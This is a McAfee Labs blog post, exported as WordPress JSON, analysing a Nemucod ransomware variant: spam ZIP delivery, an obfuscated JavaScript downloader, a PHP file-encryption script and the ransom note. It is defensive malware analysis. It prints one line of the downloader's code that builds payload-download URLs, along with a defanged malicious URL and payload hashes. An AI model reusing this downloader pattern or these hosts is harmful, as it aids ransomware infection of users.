{"id":50733,"date":"2016-06-20T18:58:39","date_gmt":"2016-06-21T01:58:39","guid":{"rendered":"https:\/\/blogs.mcafee.com\/?p=50733"},"modified":"2025-06-02T03:11:19","modified_gmt":"2025-06-02T10:11:19","slug":"javascript-php-joint-exercise-delivers-nemucod-ransomware","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/","title":{"rendered":"JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware"},"content":{"rendered":"<p>The ransomware Nemucod has been very prevalent in the last few months. Nemucod&#8217;s habit of frequently changing its delivery mechanism and infection vector to evade detection makes this threat very challenging\u00a0to security researchers. Recently, we observed in the wild a new variant of Nemucod that shows another change. This variant downloads a PHP file along with other files. All together these payloads encrypt the victim\u2019s machine. (You can read more about Nemucod in\u00a0<a href=\"https:\/\/kc.mcafee.com\/resources\/sites\/MCAFEE\/content\/live\/PRODUCT_DOCUMENTATION\/26000\/PD26309\/en_US\/McAfee_Labs_Threat_Advisory_JS-Nemucod.pdf\">this McAfee Labs Threat Advisory.<\/a>)<\/p>\n<p>The malware&#8217;s spreading mechanism is the same as in\u00a0previous versions. It arrives in a spam email with a ZIP attachment. The contents of the spam email are crafted using social engineering techniques to lure victims. The JavaScript inside the ZIP is highly obfuscated and is very tough to understand at first. The last few lines of the script\u00a0(hash: 0316CC3EBA6175E27049EB1C979C2D99)\u00a0look like this:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-50734\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/1-3.jpg\" alt=\"1\" width=\"870\" height=\"195\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/1-3.jpg 870w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/1-3-300x67.jpg 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/1-3-768x172.jpg 768w\" sizes=\"auto, (max-width: 870px) 100vw, 870px\" \/><\/p>\n<p>Once we deobfuscated the JavaScript, we found readable strings inside. To help understanding, we have divided the script into separate steps.<\/p>\n<p><strong>Assigning the variables:<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-50735\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2-2.jpg\" alt=\"2\" width=\"1236\" height=\"304\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2-2.jpg 1236w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2-2-300x74.jpg 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2-2-768x189.jpg 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2-2-1024x252.jpg 1024w\" sizes=\"auto, (max-width: 1236px) 100vw, 1236px\" \/><\/p>\n<p>A unique long string is assigned to a variable used later to construct the URL that downloads the malicious payload. Here we can see five domain names assigned as an array that also will be part of making the\u00a0URL. The\u00a0ExpandEnvironmentStrings method gets the %TEMP% location for storing the downloaded payloads.<\/p>\n<h2><strong>Downloading the malicious payload:<\/strong><\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-50736\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/3-2.jpg\" alt=\"3\" width=\"1268\" height=\"812\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/3-2.jpg 1268w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/3-2-300x192.jpg 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/3-2-768x492.jpg 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/3-2-1024x656.jpg 1024w\" sizes=\"auto, (max-width: 1268px) 100vw, 1268px\" \/><\/p>\n<p>The malware checks for a.txt in the %TEMP% folder before proceeding. If the file is present, the malware\u00a0will stop. Otherwise, it uses a &#8220;for loop&#8221; to construct the URL and download the payloads.<\/p>\n<p>Let\u2019s look into this process for i=0 (because i=id and id=0) and n=1. The malware\u00a0prepares the HTTP GET request in line 19 (preceding screen) and sends a synchronous HTTP request.<\/p>\n<pre style=\"padding-left: 30px;\">xo.open(\"GET\", \"http:\/\/\" + ll[i] + \"\/counter\/?ad=\" + ad + \"&amp;id=\" + id + \"&amp;rnd=\" + i + n, false);<\/pre>\n<p>This line resembles the following address:<\/p>\n<p><u>hxxp:\/\/bellefremee.com\/counter\/?ad=1Q3ETyWvDJMRxaLztKLV1zcjzcRrGQvzZE&amp;id= c5Jzzaa6WhF1OaBDyD_7aoT6MtP68oT1N1Gj36WpPLjg0VeFz1fMonKZ6ZeJJpqJJWF y4u5HtbBxToPGGh5vO5vYsHh9fNB&amp;rnd=01<\/u><\/p>\n<p>From this address the malware\u00a0tries to download three binaries plus one PHP and one DLL files:<\/p>\n<ul>\n<li>a.exe (hash: 9F13CC0B1B3B03CBEFD8141E5F50B1C1)<\/li>\n<li>a1.exe (hash: 9C24738B403973653B6634C9299284FB)<\/li>\n<li>a2.exe (hash: 149640B09DC390A881EBBAFD54B7853A)<\/li>\n<li>php4ts.dll (hash: 106FFA7E8342890798F1AE110F763471)<\/li>\n<li>a.php (hash: B670BF0C481146C52EBE5FBD87879960).<\/li>\n<\/ul>\n<p>In the same fashion the malware\u00a0constructs five URLs and tries to download the five payloads to the\u00a0%TEMP% location.<\/p>\n<p>The downloaded payload a.exe is the official\u00a0PHP interpreter.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-50737\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/4-2.jpg\" alt=\"4\" width=\"647\" height=\"744\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/4-2.jpg 647w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/4-2-261x300.jpg 261w\" sizes=\"auto, (max-width: 647px) 100vw, 647px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Registry key modifications and deleting files:<\/strong><\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-50738\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/5-2.jpg\" alt=\"5\" width=\"1754\" height=\"732\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/5-2.jpg 1754w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/5-2-300x125.jpg 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/5-2-768x321.jpg 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/5-2-1024x427.jpg 1024w\" sizes=\"auto, (max-width: 1754px) 100vw, 1754px\" \/><\/p>\n<p>We further deobfuscated the script and found more readable strings:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-50739\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/6-2.jpg\" alt=\"6\" width=\"1432\" height=\"257\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/6-2.jpg 1432w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/6-2-300x54.jpg 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/6-2-768x138.jpg 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/6-2-1024x184.jpg 1024w\" sizes=\"auto, (max-width: 1432px) 100vw, 1432px\" \/><\/p>\n<p>Now we can see that a.exe accepts the a.php script. This a.exe is solely a PHP\u00a0interpreter. For the execution of a.php, the malware\u00a0uses php4ts.dll and a.exe as the dependencies.<\/p>\n<p>The process also adds \u201c.Crypted&#8221; registry names under HKEY_CURRENT_USER Run and HKEY_CLASSES_ROOT Run to start the .txt startup. After infecting the system, the malware\u00a0deletes the payloads a.php, a.exe, and php4ts.dll.<\/p>\n<h2><strong>The ransom note:<\/strong><\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-50740\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/7-2.jpg\" alt=\"7\" width=\"1060\" height=\"862\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/7-2.jpg 1060w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/7-2-300x244.jpg 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/7-2-768x625.jpg 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/7-2-1024x833.jpg 1024w\" sizes=\"auto, (max-width: 1060px) 100vw, 1060px\" \/><\/p>\n<p>Once the payloads are downloaded, the file a.txt is created on the desktop and is\u00a0later renamed DECRYPT.txt, which\u00a0contains the ransom note. Lines 49 to 87, above, create the ransom note.<\/p>\n<h2><strong>The PHP script:<\/strong><\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-50741\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/8-2.jpg\" alt=\"8\" width=\"895\" height=\"863\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/8-2.jpg 895w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/8-2-300x289.jpg 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/8-2-768x741.jpg 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/8-2-32x32.jpg 32w\" sizes=\"auto, (max-width: 895px) 100vw, 895px\" \/><\/p>\n<p>In line 3 the PHP script uses set_time_limit(0) to remove time restrictions and keep the script running as long as it wants. This script uses only one major function, Tree(),\u00a0which makes calls within the loop. The &#8220;for loop&#8221; checks for the directory chr(67) [C] to chr(90) [Z] with the help of the\u00a0is_dir() function. Inside the Tree() function, the variable $k contains a hardcoded Base64-encoded string that\u00a0encrypts the file. Then the malware\u00a0uses the preg_match() function to\u00a0perform a regular expression match to check if the path passed as an argument to the function contains any terms as shown in line 13 above. The function checks for certain folder names in the root directories.<\/p>\n<p>The malware iterates until it finds a match. After a successful match, it checks the hardcoded extensions using the preg_match() function, on line 25, and encrypts them with the extension .crypted. On line 31 we see the encryption process using a single-byte XOR with the variable $k.<\/p>\n<p>The ransom note requires the payment of\u00a00.37070 Bitcoins to restore the files. The victim first has to pay and\u00a0then enable the link to the decryption.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-50742\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/9-2.jpg\" alt=\"9\" width=\"528\" height=\"140\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/9-2.jpg 528w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/9-2-300x80.jpg 300w\" sizes=\"auto, (max-width: 528px) 100vw, 528px\" \/><\/p>\n<p>McAfee advises users to keep their antimalware signatures up to date at all times. McAfee products detect this malicious JavaScript and the payload, respectively, as JS\/Nemucod, and PHP\/Ransom.a and Trojan-FIWO! with DAT Versions 8199 and later.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The ransomware Nemucod has been very prevalent in the last few months. Nemucod&#8217;s habit of frequently changing its delivery mechanism&#8230;<\/p>\n","protected":false},"author":674,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[1814,76,338,180],"coauthors":[3973],"class_list":["post-50733","post","type-post","status-publish","format-standard","hentry","category-mcafee-labs","tag-computer-security","tag-cybercrime","tag-endpoint-protection","tag-malware"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware | McAfee Blog<\/title>\n<meta name=\"description\" content=\"The ransomware Nemucod has been very prevalent in the last few months. Nemucod&#039;s habit of frequently changing its delivery mechanism and infection vector\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"The ransomware Nemucod has been very prevalent in the last few months. Nemucod&#039;s habit of frequently changing its delivery mechanism and infection vector\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2016-06-21T01:58:39+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-06-02T10:11:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/1-3.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"870\" \/>\n\t<meta property=\"og:image:height\" content=\"195\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"McAfee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/\"},\"author\":{\"name\":\"McAfee\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/47851fdb92fad9456152405839c92efa\"},\"headline\":\"JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware\",\"datePublished\":\"2016-06-21T01:58:39+00:00\",\"dateModified\":\"2025-06-02T10:11:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/\"},\"wordCount\":798,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/1-3.jpg\",\"keywords\":[\"computer security\",\"cybercrime\",\"endpoint protection\",\"malware\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/\",\"name\":\"JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/1-3.jpg\",\"datePublished\":\"2016-06-21T01:58:39+00:00\",\"dateModified\":\"2025-06-02T10:11:19+00:00\",\"description\":\"The ransomware Nemucod has been very prevalent in the last few months. Nemucod's habit of frequently changing its delivery mechanism and infection vector\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#primaryimage\",\"url\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/1-3.jpg\",\"contentUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/1-3.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/47851fdb92fad9456152405839c92efa\",\"name\":\"McAfee\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/1ffadfeeda1f4f9e7891a81f27a9ecf4\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/08\/Original-Logo-96x96.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/08\/Original-Logo-96x96.png\",\"caption\":\"McAfee\"},\"description\":\"We're here to make life online safe and enjoyable for everyone.\",\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/x.com\/McAfee\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware | McAfee Blog","description":"The ransomware Nemucod has been very prevalent in the last few months. Nemucod's habit of frequently changing its delivery mechanism and infection vector","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware | McAfee Blog","og_description":"The ransomware Nemucod has been very prevalent in the last few months. Nemucod's habit of frequently changing its delivery mechanism and infection vector","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2016-06-21T01:58:39+00:00","article_modified_time":"2025-06-02T10:11:19+00:00","og_image":[{"width":870,"height":195,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/1-3.jpg","type":"image\/jpeg"}],"author":"McAfee","twitter_card":"summary_large_image","twitter_creator":"@McAfee","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/"},"author":{"name":"McAfee","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/47851fdb92fad9456152405839c92efa"},"headline":"JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware","datePublished":"2016-06-21T01:58:39+00:00","dateModified":"2025-06-02T10:11:19+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/"},"wordCount":798,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#primaryimage"},"thumbnailUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/1-3.jpg","keywords":["computer security","cybercrime","endpoint protection","malware"],"articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/","name":"JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#primaryimage"},"thumbnailUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/1-3.jpg","datePublished":"2016-06-21T01:58:39+00:00","dateModified":"2025-06-02T10:11:19+00:00","description":"The ransomware Nemucod has been very prevalent in the last few months. Nemucod's habit of frequently changing its delivery mechanism and infection vector","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#primaryimage","url":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/1-3.jpg","contentUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/1-3.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/javascript-php-joint-exercise-delivers-nemucod-ransomware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/47851fdb92fad9456152405839c92efa","name":"McAfee","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/1ffadfeeda1f4f9e7891a81f27a9ecf4","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/08\/Original-Logo-96x96.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2020\/08\/Original-Logo-96x96.png","caption":"McAfee"},"description":"We're here to make life online safe and enjoyable for everyone.","sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/x.com\/McAfee"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/50733","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/674"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=50733"}],"version-history":[{"count":2,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/50733\/revisions"}],"predecessor-version":[{"id":214837,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/50733\/revisions\/214837"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=50733"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=50733"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=50733"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=50733"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}